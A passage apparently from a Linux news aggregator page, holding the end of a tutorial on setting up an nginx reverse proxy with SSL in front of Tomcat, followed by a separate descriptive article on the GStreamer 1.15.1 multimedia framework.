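A side note: on nginx 1.15 and later, the standalone ssl on; directive used above is deprecated in favour of marking the listen directive itself. If nginx -t warns about it, the equivalent modern form (the rest of the server block stays the same) is:

```nginx
server {
    listen 443 ssl;    # replaces the separate "ssl on;" directive
    server_name linuxtechlab.com;
    ssl_certificate /etc/nginx/ssl/cert.crt;
    ssl_certificate_key /etc/nginx/ssl/cert.key;
    # ...remaining directives unchanged...
}
```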

Section 3

location / {
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_pass http://localhost:8080;
    proxy_read_timeout 90;
    proxy_redirect http://localhost:8080 https://linuxtechlab.com;
}

This section configures the proxy itself, i.e. where incoming requests are sent once they arrive. Now that we have discussed all the configuration, we will check it & then restart the nginx service,

To check the nginx configuration syntax, run the following command,

# nginx -t

Once the configuration file tests OK, we will restart the nginx service,

# systemctl restart nginx

That's it, our nginx reverse proxy with SSL is now ready. To test the setup, open a web browser & enter the URL; you should be redirected to the Apache Tomcat webpage.

This completes our tutorial on how we can configure nginx reverse proxy with ssl, please do send in any questions or queries regarding this tutorial using the comment box below.

Source

Download GStreamer Linux 1.15.1

GStreamer is an open source library, a complex piece of software that acts as a multimedia framework for numerous GNU/Linux operating systems, as well as Android, OpenBSD, Mac OS X, Microsoft Windows, and Symbian OSes.

Features at a glance

Key features include a comprehensive core library, intelligent plugin architecture, extended coverage of multimedia technologies, as well as extensive development tools, so you can easily add support for GStreamer in your applications.

It is the main multimedia backend for a wide range of open source projects, ranging from audio and video playback applications, such as Totem (Videos) from the GNOME desktop environment, to complex video and audio editors.

Additionally, the software features very high performance and low latency, thanks to its extremely lightweight data passing technology, as well as global inter-stream (audio/video) synchronization through clocking.

Comprises multiple codec packs

The project comprises several different packages, also known as codec packs, which can be easily installed on any GNU/Linux distribution from its default software repositories, all at once or separately. They are as follows: GStreamer Plugins Base, GStreamer Plugins Good, GStreamer Plugins Bad, and GStreamer Plugins Ugly.

GStreamer has a compact core library that allows for arbitrary pipeline constructions thanks to its graph-based structure, built on the GLib 2.0 object model library, which can be used for object-oriented design and inheritance.

Uses the QoS (Quality of Service) technology

In order to guarantee the best possible audio and video quality under high CPU load, the project uses QoS (Quality of Service) technology. In addition, it provides transparent and trivial construction of multi-threaded pipelines.

Thanks to its simple, stable and clean API (Application Programming Interface), developers can easily integrate it into their applications, as well as to create plugins that will extend its default functionality. It also provides them with a full featured debugging system.

Bottom line

In conclusion, GStreamer is a very powerful and highly appreciated multimedia framework for the open source ecosystem, providing GNU/Linux users with a wide range of audio and video codecs for media playback and processing.

Source
